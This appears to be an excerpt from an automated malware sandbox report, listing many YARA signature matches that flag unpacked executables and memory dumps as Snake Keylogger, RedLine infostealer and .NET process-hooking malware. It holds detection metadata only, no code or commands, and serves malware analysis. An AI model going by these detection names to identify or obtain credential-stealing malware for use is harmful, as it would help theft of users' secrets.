              Source: 26.2.xzeheenC.pif.222bb98e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.222bb98e.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.34d20000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.34d20000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.3399e790.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.3399e790.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.237be790.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.237be790.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2b37c896.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2b37c896.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 16.3.xzeheenC.pif.2991aba0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.3.xzeheenC.pif.2991aba0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 26.2.xzeheenC.pif.237be790.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.237be790.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.3.xzeheenC.pif.2072dd00.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.3.xzeheenC.pif.2072dd00.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 18.2.Cneehezx.PIF.21496c78.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 22.3.xzeheenC.pif.30aaea30.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.3.xzeheenC.pif.30aaea30.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.33965570.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.33965570.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2c595570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2c595570.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.222bc896.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.222bc896.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2c596478.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2c596478.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 22.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 26.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 16.2.xzeheenC.pif.2b37b98e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2b37b98e.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.23786478.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.23786478.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2b37b98e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2b37b98e.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.226c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.226c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.3399e790.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.3399e790.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 10.2.spoolsv.COM.2193c948.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 26.2.xzeheenC.pif.25170000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.25170000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 10.2.spoolsv.COM.219d13d8.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 26.2.xzeheenC.pif.23785570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.23785570.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 22.2.xzeheenC.pif.3255b98e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.3255b98e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.34ca0f08.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.34ca0f08.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2c5ce790.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2c5ce790.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2dcd0f08.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2dcd0f08.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2e330000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.23786478.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2e330000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.23786478.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.226c0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.226c0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 18.2.Cneehezx.PIF.214d58a8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 22.2.xzeheenC.pif.33965570.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.33965570.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.23785570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.23785570.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 18.2.Cneehezx.PIF.21496c78.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 26.3.xzeheenC.pif.2072dd00.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.3.xzeheenC.pif.2072dd00.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 22.2.xzeheenC.pif.34ca0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.34ca0000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.3255c896.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.3255c896.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2c595570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2c595570.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.33966478.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.33966478.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.3.xzeheenC.pif.30aaea30.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.3.xzeheenC.pif.30aaea30.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000016.00000002.2762571543.0000000033961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000010.00000001.1581941889.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
